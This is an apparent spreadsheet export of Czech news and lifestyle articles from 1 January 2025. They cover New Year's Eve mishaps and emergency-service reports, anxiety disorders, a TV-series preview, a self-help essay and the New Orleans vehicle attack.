    <t>Prokleté oslavy: 5&amp;nbsp;nejhorších zážitků ze Silvestra, které vás pobaví Prokleté oslavy: 5 nejhorších zážitků ze Silvestra, které vás pobaví Silvestr má být velkolepá oslava konce roku, ale někdy se promění v sérii trapasů a katastrof. Podělím se s vámi o pět nejhorších silvestrovských zážitků, které jsem buď zažila, nebo mi je vyprávěli přátelé. 1. Zamčená venku v minus deseti Kamarádka Petra to myslela dobře. Chtěla být připravená na půlnoční přípitek, a tak vyšla na balkon nachystat prskavky a skleničky. V lehkých šatech, na podpatcích a hlavně - bez klíčů. Stačil jeden poryv větru a balkonové dveře se zabouchly. „V tu chvíli mi zatrnulo,“ vypráví Petra. „Venku mínus deset, já v koktejlkách a šatech nad kolena, mobil samozřejmě v bytě. Přítel uvnitř v limbu po večerním ‚zahřívacím‘ punči.“ Po dvaceti minutách poskakování na balkóně jí došlo, že jediná cesta vede přes sousední balkon. Pan soused Josef, důchodce s velkým smyslem pro humor, ji nejdřív chvíli pozoroval dalekohledem, než jí hodil lano z vánočních světýlek. „Přelezte k nám, mladá pani, aspoň nám oživíte Silvestra!“ A tak Petra, bývalá gymnastka, předvedla své umění na balkoně ve čtvrtém patře. Sousedi ji pak nechali přespat na gauči, dali jí teplý čaj s rumem a celou noc se bavili historkami z mládí. Její přítel se probudil až ráno a nechápal, proč má 28 zmeškaných hovorů. Spáč před půlnocí Tomáš je pověstný svým heslem: „Silvestr se musí pořádně oslavit“. Jenže loni to trochu přehnal s předčasnou oslavou. Už v šest večer začal ochutnávat vánoční punč, v sedm přešel na whisky a v osm dorazil na naši oslavu s lahví šampaňského v každé ruce. „Tohle bude nejlepší Silvestr všech dob!“ hlásal, když se rozvalil v křesle. V devět už jen tiše přikyvoval, v deset klimbal a v půl jedenácté tvrdě spal. Ani dělobuchy před domem ho neprobudily. Holky mu rtěnkou namalovaly na čelo Šípková Růženka 2023, ozdobily ho vánočními řetězy a dokonce mu daly do ruky plyšového jednorožce. Všechno zdokumentovaly a daly na Instagram. Tomáš se probudil v šest ráno, nechápal, proč má na sobě vánoční výzdobu, a ptal se, kdy začne ta správná oslava. Šampaňské vs. elektronika Manžel je velký fanoušek Formule 1. Když loni viděl, jak vítězové stříkají šampaňským, dostal skvělý nápad. „Udělám to jako Hamilton!“ prohlásil těsně před půlnocí. Láhev důkladně protřepal, namířil ji přes celý obývák a… zapomněl, že tam stojí naše nová 65palcová televize. Gejzír šampaňského zasáhl televizor přímo do obrazovky. Nejdřív to zajiskřilo, pak to zablikalo a nakonec obrazovka zčernala. Druhý den nového roku jsme strávili v elektru, kde jsme utratili úspory na letní dovolenou za novou televizi. Manžel od té doby otvírá šampaňské výhradně nad dřezem a s hlavou skloněnou. Ohňostroj v obýváku Patnáctiletý Honza od sousedů chtěl rodičům připravit nezapomenutelnou oslavou. To se mu povedlo dokonale. Dostal nápad zapíchat prskavky do umělé palmy v obýváku. „Bude to jako světelná fontána!“ tvrdil. A byla. Prskavky zapálily umělé listy, ty zapálily záclony a za pět minut hořela půlka obýváku. Hasičům se podařilo požár uhasit, ale byt vypadal jako po výbuchu. Rodiče celý první týden nového roku malovali, větral se kouř a Honza má doživotní zákaz manipulace s čímkoliv hořlavým. Silvestrovská večeře pro hasiče Moje loňská silvestrovská katastrofa začala nevinně. Chtěla jsem všechny ohromit francouzským menu - kachna na pomerančích jako hlavní chod. Jenže jsem se zapovídala u vína a úplně zapomněla na čas. Když se spustil požární alarm, mysleli jsme, že je to jen další petarda. Pak ale začal být cítit kouř. Z trouby se valil černý dým a moje „křupavá“ kachna vypadala jako meteorit. Někdo z sousedů zavolal hasiče. Ti dorazili přesně o půlnoci, v plné polní. Místo přípitku jsme větrali, uklízeli a objednávali pizzu. Hasiči byli ale skvělí - pomohli nám uklidit a ještě si s námi připili (nealkoholickým) šampaňským. Od té doby mám v kuchyni tři budíky a časovač na telefonu. A kachnu už peču jen pod přísným dohledem střízlivého člověka.</t>
  </si>
  <si>
    <t>20250101_138_3696197861_b6620ef7f7916d75bb9d.html</t>
  </si>
  <si>
    <t>b6620ef7f7916d75bb9d</t>
  </si>
  <si>
    <t>Panické ataky i nekončící nadměrné obavy: Jak se vyrovnat s úzkostnou poruchou, radí MUDr. Šédová</t>
  </si>
  <si>
    <t>Panické ataky i nekončící nadměrné obavy: Jak se vyrovnat s úzkostnou poruchou, radí MUDr. Šédová WhatsApp Tzv. panickou poruchu provází panické záchvaty, které se projevují spíše fyzickými příznaky (foto: Adéla Šatalíková) Předvánoční dny a vánoční svátky nejsou pro mnohé obdobím klidu. Naopak bývají často velmi hektické a plné stresu, proto jsou spojené s nárůstem různých duševních onemocnění. Mezi ně patří také úzkostná porucha. Zvládli jste vše bez problémů? Jak se úzkosti projevují? Co patří mezi rizikové faktory? A kdy vyhledat pomoc? „Přípravy na svátky, shánění dárků, finanční zátěž nebo rodinné konflikty mohou zvyšovat úroveň stresu a úzkosti. Úzkost je běžná lidská emoce, jestliže se však objevuje nečekaně, v neadekvátních situacích, trvá dlouho nebo je nepřiměřeně intenzivní, jedná se pravděpodobně o úzkostnou poruchu,“ vysvětluje MUDr. Kateřina Šédová, zakladatelka neziskové organizace Loono, která se duševnímu zdraví věnuje v rámci své kampaně Dobré nitro. „Za život se s úzkostnou poruchou setká až 25 % lidí,“ dodává. Úzkost je běžná adaptační emoce, která nám pomáhá soustředit se a vydat ze sebe to nejlepší. Jestliže je však nepřiměřená situaci nebo věku, brání schopnosti normálně fungovat a narušuje vztahy, pracovní výkon nebo školní výsledky, jedná se o úzkostnou poruchu. Lidé s touto poruchou se obvykle vyhýbají situacím, které spouštějí nebo zhoršují jejich příznaky. Během svého života se s úzkostnou poruchou setká každý 4. člověk, častěji se vyskytuje u žen, které mají obvykle také závažnější průběh onemocnění. Úzkostnými poruchami mohou trpět ale také děti. Panické záchvaty i nekontrolovatelné nadměrné obavy Úzkostná porucha má celou řadu fyzických a psychických příznaků. Člověk žije neustále v očekávání něčeho špatného, je plačtivý, neumí relaxovat a objevit se mohou také potíže se spánkem. Mezi další psychické projevy patří neklid, strach ze smrti či ztráty kontroly, strach z budoucnosti, odosobnění nebo potíže se soustředěním. Úzkostná porucha se může projevovat také některými fyzickými příznaky. Časté je bušení srdce, objevit se může pocení, třes, sucho v ústech nebo zrychlené dýchání. Člověk může pociťovat bolesti hlavy, břicha či na hrudi, dostavit se mohou i návaly horka a chladu, mravenčení nebo závrať. Typická je také neschopnost se uvolnit. Jaké jsou příznaky syndromu vyhoření a jak se mu vyhnout, vysvětluje odborník Úzkostné poruchy však mohou vypadat různě. Tzv. panickou poruchu provází panické záchvaty, které se projevují spíše fyzickými příznaky. Ty působí velmi závažně a řada lidí při nich může mít pocit, že mají srdeční infarkt nebo jinou život ohrožující nemoc. Tyto záchvaty vznikají náhle bez vazby na konkrétní situaci a zpravidla do 5 až 20 minut odezní. Mohou se objevit i u jiných duševních onemocnění, jako jsou deprese nebo posttraumatická stresová porucha. Dalším typem úzkostné poruchy je tzv. generalizovaná úzkostná porucha, kterou charakterizují nekontrolovatelné nadměrné obavy, které jsou přítomny neustále, i když se někdy dostanou do popředí více a jindy méně. Člověk trpící touto poruchou může být obecně velmi ustaraný, přestože mu není zcela jasné, před čím má vlastně strach. Bát se může o sebe, o své okolí, ale tyto starosti a obavy obvykle neodpovídají závažnosti situace. Mezi úzkostné poruchy patří také fobie a sociální fobie. Fobie je intenzivní a nadměrný strach z určitého předmětu, situace nebo činnosti, která obecně není škodlivá. Pacienti vědí, že jejich strach je přehnaný, ale nedokáží svoje pocity potlačit. Lidem trpícím sociální fobií způsobují každodenní běžné interakce značnou úzkost a vyvolávají v nich rozpaky. Mají strach z negativních reakcí okolí, ale i z úzkosti samotné a z toho, že se jim to stane znovu. Velké životní události i menší stresové situace Rizikové faktory kombinují vrozené predispozice s vlivy okolního prostředí. Pokud má člověk v rodině někoho, kdo trpí úzkostnou poruchou, riziko, že se u něj projeví také, je vyšší. Vyšší riziko vzniku duševního onemocnění mají i lidé, kteří nějakým psychickým onemocnění trpěli v minulosti. Svou roli hrají také některé osobnostní rysy, jako jsou perfekcionismus, nízké sebevědomí nebo tendence věci neustále analyzovat. Riziko mohou zvyšovat závažné životní situace či traumata, jako jsou ztráta blízkého, vyhození z práce nebo prožité sexuální či fyzické obtěžování. Úzkosti může zhoršovat konzumace návykových látek, jako jsou alkohol nebo drogy. Mohou je vyvolávat velké životní události, ale také nahromadění menších stresových situací, jako je například pracovní stres, neustálé starosti o finance nebo právě velká očekávání a přetížení v období před vánočními svátky a v jejich průběhu. Jak úzkostem předejít? Nezisková organizace Loono přináší šest základních tipů, které pomohou s péčí o duševní zdraví: Během dne se zkuste na pár minut zastavit, pročistit si hlavu (pomáhá procházka či dechová cvičení). Zaměřte se na aktivity, které vám zvednou náladu. Pusťte si třeba svůj oblíbený film, přečtěte si před spaním knížku, povečeřte s přáteli nebo se vraťte k oblíbenému koníčku. Nezapomeňte, že relaxovat se dá nejen koukáním na oblíbený seriál, ale zkusit můžete třeba sport, jógu či dechová cvičení. Projít se můžete i po cestě z práce domů. Dávejte si realistické cíle. Vytvořte si seznam denních úkolů a ty se snažte splnit. Myslete na zdravý životní styl. Vyhýbejte se alkoholu , cigaretám i jiným návykovým látkám. Právě ty situaci ještě zhoršují. Pozitivní myšlení pomáhá s uklidněním a kontrolou stresu. Místo „to nedokážu“ si říkejte „Udělám to nejlépe, jak dovedu“. „Jestliže na sobě příznaky úzkostné poruchy zpozorujete, neváhejte a navštivte svého praktického lékaře. Ten vás odešle k psychiatrovi, který doporučí léčbu,” vysvětluje Kateřina Šédová. „Léčba obvykle spočívá v psychoterapii a psychoedukaci. V případě závažnějších příznaků se nasazuje i medikace,” dodává. Zdroj: Kateřina Šédová Autor: David Koudelka Autor person David Koudelka</t>
  </si>
  <si>
    <t>2050</t>
  </si>
  <si>
    <t>20250101_139_3696158416_ced2c05c80dfd1cff3e3.html</t>
  </si>
  <si>
    <t>ced2c05c80dfd1cff3e3</t>
  </si>
  <si>
    <t>Amputace prstů, bitky, ale i srážka s divočáky. Záchranáři měli na Silvestra na pilno</t>
  </si>
  <si>
    <t>Amputace prstů, bitky, ale i srážka s divočáky. Záchranáři měli na Silvestra na pilno Amputace prstů, bitky, ale i srážka s divočáky. Záchranáři měli na Silvestra napilno SILVESTROVSKÁ NOC Oslavy příchodu nového roku byly v Česku pro zdravotnické záchranáře v některých krajích náročnější než před rokem, často ošetřovali lidi s úrazy od zábavní pyrotechniky, někdy i velmi závažnými. Foto: Shutterstock 1. ledna 2025 Sdílet: Oslavy příchodu nového roku byly mnohde v Česku náročnější než před rokem. Záchranáři často ošetřovali úrazy způsobené zábavní pyrotechnikou, dokonce i amputace s doživotními následky. Mnohé slavící zmohl alkohol natolik, že zaplnili záchytné stanice. Policie uvedla, že během silvestrovské noci vyjížděla k více konfliktním situacím než v běžný den a řešila i domácí násilí. Policisty nezaměstnávala jen pyrotechnika, ale třeba také srážka čtyř lidí s divokými prasaty. Hasiči celorepublikově evidují 357 požárů, což je nejvíc za minimálně sedm let. V Praze záchranáři během noci vyjeli k 348 případům, s oslavami příchodu nového roku souvisela stovka a zranění zábavní pyrotechnikou bylo devět, řekl mluvčí zdravotnické záchranné služby Karel Kirs. Před rokem zasahovali během noční směny u 229 událostí a úrazů pyrotechnikou bylo sedm. Z centra Prahy minulou noc odvezli do nemocnic 13 lidí. "Nejzávažnější případ představoval úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra," uvedl Kirs na sociální síti X. Policisté v centru Prahy pokutovali za zakázané odpalování pyrotechniky téměř 50 lidí, hlavně cizinců. Echo24 , 1. ledna 2025 NOVÝ ROK 2025 Úrazy od zábavní pyrotechniky byly častější než loni také ve středních Čechách . Záchranáři zasahovali u šesti zraněných a čtyř popálených. V Libereckém kraji na silvestra až do dnešního rána měli víc než 260 výjezdů, což je zhruba o stovku víc než běžně. Protialkoholní záchytná stanice v Pardubicích byla na silvestra plná již v 20:00, informovala pardubická městská policie. Zranění po požití alkoholu nebo od pyrotechniky zaměstnala záchranáře také v Ústeckém kraji , několik lidí přišlo o část ruky. Mladíkovi z Mostecka pyrotechnika utrhla prsty a část dlaně, řekla ČTK policejní mluvčí Ilona Gazdošová. "Pacienta jsme museli převést do ústeckého traumacentra a uvést ho do umělého spánku. Tam bylo opravdu devastující poranění způsobené zábavní pyrotechnikou," popsal mluvčí záchranářů Prokop Voleník nejvážnější výjezd během letošních oslav příchodu nového roku. Mladík z Mostecka si ponese následky po celý život. Dalibor Balšínek , 30. prosince 2024 EDITORIAL Ani v sousedním Libereckém kraji nebyla o případy spojené s bujarými oslavami nouze. Na silvestra až do dnešního rána se záchranáři nezastavili, řešili přes 260 událostí, což je zhruba o stovku víc než běžně. O půlnoci jim na dispečinku svítilo číslo 199, to dlouho nikdo nepamatuje, a do rána bylo dalších 65 událostí, řekl krátce po 06:00 na Nový rok ČTK mluvčí Zdravotnické záchranné služby Libereckého kraje Michael Georgiev. V Moravskoslezském kraji bylo zásahů víc než dvojnásobně oproti běžným nocím, při odpalování pyrotechniky se zranilo osm lidí. Na silnici I/56 u Paskova večer přes komunikaci proběhlo stádo divokých prasat. Dva vozy se srazily se zvířaty. Čtyři lidé se lehce zranili, uvedli moravskoslezští policisté. Naopak za relativně klidnou označili silvestrovskou noc záchranáři z Plzeňského nebo Karlovarského kraje . Policie uvedla, že během silvestra a noci na Nový rok nezaznamenala žádnou mimořádnou událost. "Ale i přesto jsme řešili mnohem více konfliktních případů než v běžný den. Především se jednalo o rušení nočního klidu, různé formy napadání a bohužel i domácí násilí," napsala na síti X. Celorepublikově policisté řešili 3250 případů. "Což je přibližně stejně jako v běžný pracovní den," doplnila. med , 1. ledna 2025 NOVÁ VERZE SLOVENSKÉ HYMNY Na Táborsku se ztratil devětašedesátiletý muž, který po 22:00 odešel z večírku v obci Dírná. Policie ho hledala i s použitím vrtulníku, našla ho v jiné obci. Policisté také vyjížděli také k potyčce na ubytovně, při které jeden člověk utrpěl řezné poranění. Zadrželi muže, který v Praze 10 poškodil bezpečnostním kladívkem okna u deseti zaparkovaných vozidel, a také opilého muže, který na Smetanově nábřeží hodil po policejním voze skleněnou láhev. Opilí lidé a jejich úrazy zaměstnávali policisty a záchranáře také v dalších krajích. Ještě ve večerních hodinách policisté v Moravskoslezském kraji řešili například srážku dvou automobilů se stádem divokých prasat nebo nehodu, kdy chodec zakopl o koleje a upadl před projíždějící vlak. Strojvedoucí naštěstí stihl včas zastavit. max , 1. ledna 2025 SPOR O PLYN POKRAČUJE S pyrotechnikou podle předběžných informací souviselo mezi 20:00 na silvestra a 06:00 na Nový rok 190 výjezdů hasičů, před rokem to bylo 158. Nejčastěji hořely odpadkové koše, kontejnery nebo zbytky odpálené pyrotechniky. Od ní často vzplanuly keře, tráva nebo živé ploty. Na 357 se celorepublikový počet požárů zvýšil z 260 o předchozí silvestrovské noci. Což je nejvíce za minimálně sedm let. Nejrušnější noc měli hasiči v Moravskoslezském a Středočeském kraji , tam z 51 požárů jen čtyři nebyly od pyrotechniky. Sdílet: Silvestrovské oslavy zdravotnictví policie Související články Autor: Echo24 || Sdílet: Rubrika transition_slide Domov</t>
  </si>
  <si>
    <t>20250101_14_3698136966_410bfaa30244d460d3b2.html</t>
  </si>
  <si>
    <t>410bfaa30244d460d3b2</t>
  </si>
  <si>
    <t>Zítra v Ulici: Ve čtvrtek se Soňa opije, ztrapní a složí k zemi. Otík si to spokojeně natočí</t>
  </si>
  <si>
    <t>Zítra v Ulici: Ve čtvrtek se Soňa opije, ztrapní a složí k zemi. Otík si to spokojeně natočí Publikováno: 1. ledna 2025, 21:30 Komentáře Boží mlýny v případě Soni Čechové mlely hodně pomalu, ale zdá se, že teď se konečně pořádně rozjedou. Ve čtvrtek se pokusí Magdě a Otovi zavařit, jenže se jí to vrátí jako bumerang. Na večírku v Coolně neodhadne míru, znovu se opije, roztančí a znemožní tak, že to Otík prostě musí zachytit na videu. Soňa je na Magdu podezřele milá Kolty proklatě nízko a díky Otíkovi dobrá nálada Sladké mámení Soně ještě pěkně zhořkne Soňa je na Magdu podezřele milá Prokop ( Ondřej Studénka ) se Soně ( Lucie Vondráčková ) zmínil, že se spolu s Eddiem ( Jiří Panzner ), Otíkem ( Filip Rajmont ) a Magdou ( Veronika Čermák Macková ) chystá na westernový večírek v kovbojských kostýmech a že zahřívací drink si chtějí dopřát v Coolně. Ve čtvrtek ji syn Erik ( Adam Seidl ) poprosí, jestli by ho nepustila na studentskou párty právě v tomhle podniku. Škodolibé ředitelce dojde, že pokud tam večer převlečení profesoři vyrazí, setkají se s udivenými pohledy všech žáků a s pořádnou ostudou. I když na chodbě potká Magdu, pochopitelně se jí ani slůvkem nezmíní, že bar bude plný puberťáků. Doufá, že se ona i kolega Puklický pořádně ztrapní. Už dlouho na ně má spadeno a tuhle příležitost vnímá jako z nebe seslanou. Kolty proklatě nízko a díky Otíkovi dobrá nálada Nutno dodat, že když se parta kovbojů objeví v Coolně, Sonino přání bude téměř vyslyšeno. Rozhovory mládeže ustanou a ohromené zraky se upřou na profesory, jimž bude najednou hodně úzko. Zbytky důstojnosti zachrání Otíkova trefná hláška, která naštěstí prolomí ledy. Krátce poté se o rozproudění zábavy postará Žofka ( Kateřina Ujfaluši ), když pozve kantory, aby si se studenty zahráli veselé společenské hry. Později se Soňa pod chabou záminkou, že přináší Erikovi zapomenutou peněženku, v baru také objeví. Věří, že se pokochá pohledem na veřejnou ostudu Magdy a Otíka, ale vítězoslavný pocit ji opustí, jakmile se ukáže, že všichni profesoři u studentů bodují a sklízejí obdiv. Eddie a Prokop navrhnou Soně, aby se k jejích veselí přidala, a ona se samozřejmě nenechá přemlouvat. Vyštípe z místečka Magdu a k velké nelibosti Matěje Dvořáka ( Jiří Dlouhý ) si zabere její flek, kde bude po zbytek večera utápět v alkoholu vztek nad tím, že ona nebude u studentů nikdy tak populární, jako jsou právě Magda s Otíkem. Související článek Ulice: Soňu v novém roce čeká pád do pekel, slibuje Vondráčková . Znemožní se hned několikrát Boží mlýny se konečně dají do chodu i v případě nenáviděné Soni Čechové. Aktuálně zřejmě nejzákeřnější postava v Ulici zažije v novém roce několik… Sladké mámení Soně ještě pěkně zhořkne Tuhle nepříjemnou pravdu si Soňa uvědomí nejpozději ve chvíli, kdy Ota s Magdou budou zpívat karaoke za hlasitého povzbuzování celého baru. Jedna sklenka střídá druhou a pak, když večer ještě více pokročí a studenti se rozejdou domů, zbude v Coolně už jenom parta našich kantorů, pár náhodných hostů a děsně rozdováděná Soňa s mikrofonem. Zatímco nám falešným kvílením zkazí dojmy z písně Sladké mámení a bude divoce tančit po místnosti, Otík se chopí telefonu a její nezapomenutelné vystoupení pečlivě zaznamená. Vždycky se hodí mít po ruce takhle cenný kompromitující materiál proti nenáviděné ředitelce. Bude ale pan Puklický natolik pomstychtivý, aby video zveřejnil na sociálních sítích pro všechny zvědavé studenty? Nebo si ho nechá na horší časy? Související článek Přeslazené mámení na kovbojském večírku v Ulici: Soňa se zkraje roku příšerně ztrapní Koho pobavil pohled na opilou Soňu, ten by si neměl nechat ujít ani novoroční premiérové díly. Ředitelka Čechová prožije smutného silvestra a náladu… Reakce k článku Autor: Simona Michálková Autor person Simona Michálková Rubrika transition_slide Seriál Ulice</t>
  </si>
  <si>
    <t>157010</t>
  </si>
  <si>
    <t>20250101_140_3696165566_14c7214c394f7ba9cdff.html</t>
  </si>
  <si>
    <t>14c7214c394f7ba9cdff</t>
  </si>
  <si>
    <t>Hledání vnitřní harmonie v&amp;nbsp;Silvestrovských bublinkách</t>
  </si>
  <si>
    <t>Hledání vnitřní harmonie v&amp;nbsp;Silvestrovských bublinkách Hledání vnitřní harmonie v Silvestrovských bublinkách Aneb o tom, že život je privilegium. Vánoce plné „spousty“, „hodně“ a „ještě víc“ už jsou za námi a z letošního roku už v naší zemi zbývá jen posledních pár hodin. Silvestr a Nový rok v nás všech vedle „party“ nálady vyvolávají také nostalgii. Dokud náš mozek není až příliš intoxikován alkoholem a jinými „zvedači nálady“, dokáže se s námi vrátit v čase a v retrospektivě nám ukázat cestu, kterou jsme doposud v životě urazili. Říká se, že zpětný pohled je vždy 20/20, tedy zpětně vidíme vše jasně i bez dioptrií a zaostření. Nicméně já věřím, že pokud si my sami nezamlžíme své brýle požadavky vlastního ega, tak může být i pohled do budoucnosti jasný i bez dioptrií. Sejmout řetězy a okovy, kterými naše ego svázal náš ekonomicky řízený svět, není vůbec snadné. Základní potřeba lidského ega je být nejlepší a vlastnit materiální, protože jedině to přece může lidskému druhu zajistit inherentní potřebu někam patřit. Ale duše trpí pod náporem věcí a požadavků materiálního světa. Elton John zpívá, že „vše, co potřebuje, je ten jeden / ta jedna ( The One ). Ale abychom vůbec mohli najít toho jednoho či jednu, musíme nejprve najít sami sebe, a pokud možno tu nejlepší možnou verzi. Spoustu věcí v našem životě všichni totiž děláme jen proto, že: co si o mě pomyslí ostatní nejsem na to dost dobrý / dobrá nejsem dost přitažlivý / přitažlivá až zhubnu XX kilogramů až se naučím… až přestanu s… až, až Velmi dobře sama vím, jak těžké je najít sebe sama pod nánosy ekonomicky materiálního světa ovládaného třpytivým pozlátkem iluzorní dokonalosti televize, fotografií, médií a internetu. A nejen to. Lidé kolem nás, ve snaze uspět, vystoupit z řady, přitáhnout pozornost a v touze po dokonalosti, hrají většinou navenek hru „jsem lepší než TY / VY,“ protože jinak by je jejich vlastní ego uklovalo k smrti. Ať tak či tak. Většina lidí se necítí být dobrou verzí sama sebe a nostalgické ohlédnutí za uplynulým rokem je mnohdy neskutečně děsí, protože nemají pocit, že by je vlny plynoucího času přinesly blíže k pobřeží kontinentu zvaného „vnitřní harmonie a sebe naplnění.“ Jediného kontinentu, kde naše duše najdou vše, co skutečně hledají a potřebují. Hledání sama sebe nikdy není záležitostí jednoho dne, stejně tak jako snaha stát se lepší verzí sebe sama. Ale když to uděláme, když vykročíme tím správným směrem, i když jen malinkatými krůčky, tak můžeme za rok pohlédnout do zpětného zrcátka našeho života a zjistit, že jsme urazili pořádný kus cesty. Nejen to. Možná zjistíme, že jsme se stali lepší verzí sebe sama a našli se. A třeba také, že jsme si začali život skutečně užívat. Protože najít se a stát se svojí nejlepší možnou verzí je oním skutečným eluzivním cílem našeho života. Takže do toho nadcházejícího roku přeji úplně všem: Žijte každý den svého života, jako byste byli na dovolené a měl to být váš poslední den. Žijte a vychutnávejte každý dech, který naberete do svých plic. Protože jak už řekl Jan Werich : „Život vždycky stál, stojí a bude stát za to, aby ho člověk dožil,“ a pořádně si ho užil. A pokud snad cestou narazíte na nějaký ten pár bublinek ve skle, tak si je vychutnejte! Na zdraví, na štěstí a na vaši cestu za tou nejlepší verzí vás samotných. S láskou a pozitivní energií do vašeho dne. Mara</t>
  </si>
  <si>
    <t>20250101_141_3696152606_b608f6912fa770fbcb90.html</t>
  </si>
  <si>
    <t>b608f6912fa770fbcb90</t>
  </si>
  <si>
    <t>Agent kumquat spojuje chutě, barvy i kultury</t>
  </si>
  <si>
    <t>20250101_142_3696153306_5ee03e0675462a8c34d5.html</t>
  </si>
  <si>
    <t>5ee03e0675462a8c34d5</t>
  </si>
  <si>
    <t>Řidič najel v New Orleans do davu slavícího nový rok. Deset lidí zahynulo</t>
  </si>
  <si>
    <t>Řidič najel v New Orleans do davu slavícího nový rok. Deset lidí zahynulo Policie již dříve uvedla, že řidič si zřejmě počínal úmyslně. Starostka New Orleans LaToya Cantrellová čin označila za teroristický útok, ale dodala, že vyšetřování pokračuje. „Muž řídil pickup a jel po Bourbon Street velmi rychle, bylo to velmi úmyslné chování,“ řekla novinářům Anne Kirkpatricková z neworleanské policie. Podle ní se muž snažil přejet co nejvíce lidí. Dodala, že nebyl pod vlivem alkoholu a že postřelil dva policisty. Jejich zdravotní stav je stabilizovaný. Kirkpatricková neuvedla, zda je muž ve vazbě, či zda byl také zraněn. Většina ze 35 zraněných jsou podle ní místní obyvatelé, nikoli návštěvníci města. „Spolupracujeme s našimi partnery na vyšetřování tohoto útoku jako teroristického činu,“ uvádí se v prohlášení FBI , který případ převzal. Svět FBI rovněž potvrdil předchozí informaci televize CNN a agentury AP, že podezřelého z útoku policie zastřelila. „Dotyčný zaútočil na příslušníky orgánů činných v trestním řízení a nyní je po smrti,“ uvedl úřad. FBI útočníka identifikovala V pozdějším prohlášení byl útočník identifikován jako 42letý americký občan z Texasu jménem Shamsud-Din Jabbar. V autě, které bylo patrně z půjčovny, byla nalezena vlajka teroristické organizace Islámský stát. FBI se nyní snaží odhalit možné vazby podezřelého s teroristickými organizacemi. Podle agentury AFP mají vyšetřovatelé podezření, že útočník - bývalý voják - nejednal sám. Úřad dále uvedl, že ve vozidle byly nalezeny zbraně a výbušniny. Další podomácku vyrobené bomby byly objeveny ve Francouzské čtvrti New Orleans , kde se incident odehrál. Vyšetřovatelé nyní zjišťují, zda byly funkční. V autě možná byla i výbušnina Auto vjelo do davu lidí asi tři hodiny po půlnoci místního času (kolem 10:00 SEČ) na ulici Bourbon Street, která je proslulá rušným nočním životem. Stanice CNN uvedla, že New Orleans se dnes večer také chystá na čtvrtfinále akce Sugar Bowl, v něm se utkají týmy dvou univerzit v zápase amerického fotbalu. Podle stanice CNN čin vyšetřuje FBI , která ověřuje i možnost, že ve voze bylo funkční výbušné zařízení. „Byla nalezena improvizovaná výbušná zařízení a snažíme se potvrdit, zda byla použitelná,“ citovala CNN kancelář FBI v New Orleans . Americký prezident Joe Biden v prohlášení Bílého domu uvedl , že nařídil vyčlenit veškeré zdroje potřebné pro vyšetření případu. Uvedl také, že žádný útok na Američany nebude tolerován a že násilí v jakékoliv podobě není ospravedlnitelné. Státy EU Zvolený prezident Donald Trump , který se úřadu ujme 20. ledna, útok bez konkrétních podrobností spojil s nelegální migrací. Svůj příspěvek ohledně událostí v New Orleans začal větou, že „příchozí zločinci jsou daleko horší než zločinci, které máme v naší zemi“. Neuvedl ale, jak tento případ souvisí s migrací. „Naše ambasáda i honorární konzul v New Orleans jsou v kontaktu s místními úřady a situaci monitorují. Nemáme informace o tom, že by se nešťastná událost nějak dotkla českých občanů,“ sdělil ČTK mluvčí české diplomacie Drake. Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>610690</t>
  </si>
  <si>
    <t>20250101_143_3696111245_b5288aa6b1295cbe628e.html</t>
  </si>
  <si>
    <t>b5288aa6b1295cbe628e</t>
  </si>
  <si>
    <t>Policisté v Královéhradeckém kraji řešili o Silvestru zejména napadení a rvačky</t>
  </si>
  <si>
    <t>Policisté v Královéhradeckém kraji řešili o Silvestru zejména napadení a rvačky Foto: ilustr foto, Týdeník Policie Královéhradecký kraj V období od 18. hodiny 31. prosince 2024 do 6. hodiny ranní 1. ledna 2025 přijali operační důstojníci okolo 190 oznámení, což je téměř identický počet jako minulý rok. Jednalo se převážně o fyzická či slovní napadení, problémy v občanském soužití, rvačky, výtržnosti, rušení nočního klidu, požáry a komplikace v silniční dopravě. Společným jmenovatelem přitom u drtivé většiny těchto událostí byl alkohol . Příkladně, krátce po 21. hodině jsme na lince 158 obdrželi oznámení o podnapilém řidiči osobního vozidla zn. Volkswagen v Hradci Králové . Policistům se ho na předpokládané trase oznamovatele podařilo nalézt a zastavit. Dechové zkoušky u řidiče byly pozitivní a vykázaly hodnoty 1, 97 a 2 promile alkoholu v dechu. Muž byl následně zadržen a po jeho vystřízlivění s ním budou provedeny standardní procesní úkony. Věc je prověřována pro podezření ze spáchání přečinu ohrožení pod vlivem návykové látky. Krátce po 22. hodině jsme přijali oznámení o osobním vozidle jedoucím v protisměru na dálnici D11. Oznamovatelka jela z Prahy na Hradec Králové a okolo 83. kilometru mělo proti ní jet osobní vozidlo zn. Hyundai . Policejní hlídky projely daný úsek dálnice v obou směrech, ale popsané vozidlo nenalezly. Ani dálniční kamery uváděné vozidlo nezachytily. Opakovaně jsme vyjížděli v součinnosti s hasiči k požárům, převážně se jednalo o koše a kontejnery, ale i o stromy a v jednom případě jsme vyjížděli k hořícímu vozidlu. Vždy včasným zásahem se podařilo minimalizovat škody. Během noci docházelo k průběžným oznámením na použití pyrotechniky. V žádném případě nebylo zjištěno protiprávní jednání. Těsně před půlnocí se dle oznamovatele nezvaný host snažil dostat do uzavřené pizzerie na Jičínsku. Na místě byl však po našem příjezdu klid. Nedaleko byla zjištěna bavící se mládež, která byla ztotožněna a zkontrolována. Obce Špindlerův Mlýn , Skuhrov nad Bělou, Třebechovice pod Orebem a Mostek spojovala během přelomu roku obava o blízké, kteří byli někým z rodiny či známými pohřešováni. Ve všech čtyřech případech byli všichni naštěstí po krátké chvíli nalezeni a všechna pohřešování měla tak šťastný konec. Některá oznámení se po příjezdu hlídky na místo ani nepotvrdila. Na mnoha zásazích jsme spolupracovali s hasiči, záchranáři a strážníky městských policií. K závažnému narušení veřejného pořádku nedošlo. Vzhledem k očekávanému zvýšenému provozu na silnicích během dnešního dne, kdy se mnoho lidí bude vracet z rekreací a oslav, apelujeme na řidiče, aby byli na cestách opatrní a ohleduplní, a aby v žádném případě neřídili pod vlivem alkoholu nebo jiných návykových látek. Silvestrovská opatření pro policisty nekončí ani s příchodem Nového roku. S nástupem roku 2025 se policejní hlídky zaměřují kromě dohledu nad veřejným pořádkem i na bezpečnost na silnicích. Mějte na paměti, že alkohol bývá častou příčinou dopravních nehod s tragickými následky. Buďte zodpovědní a ohleduplní, nejen na začátku tohoto roku! por. Ing. Karolína Macháčková Policie ČR Pátrání po osobách Pátrání po vozidlech Nábor k Policii ČR Nábor k Celní správě ČR Nábor k Vězenské službě ČR COPYRIGHT © 2025 TÝDENÍK POLICIE. BEZ PÍSEMNÉHO SOUHLASU REDAKCE JE PŘÍSNÝ 